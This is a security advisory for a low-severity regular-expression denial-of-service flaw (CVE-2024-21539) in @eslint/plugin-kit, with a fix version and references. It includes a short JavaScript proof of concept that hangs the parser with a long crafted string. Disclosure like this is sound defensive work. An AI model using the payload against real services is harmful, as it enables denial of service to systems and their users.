LOW3.5
GHSA-7q7g-4xm8-89cq
Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
Quick fix
GHSA-7q7g-4xm8-89cq — @eslint/plugin-kit: upgrade to the fixed version with the command below.
npm install @eslint/plugin-kit@0.2.3Details
Crafting a very large and well crafted string can increase the CPU usage and crash the program.
## POC
```js const { ConfigCommentParser } = require("@eslint/plugin-kit");
var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A";
console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end")
// run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage ```
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/eslint/rewrite/security/advisories/GHSA-7q7g-4xm8-89cq[WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2024-21539[ADVISORY]
- https://github.com/eslint/rewrite/commit/071be842f0bd58de4863cdf2ab86d60f49912abf[WEB]
- https://github.com/eslint/rewrite[PACKAGE]
- https://security.snyk.io/vuln/SNYK-JS-ESLINTPLUGINKIT-8340627[WEB]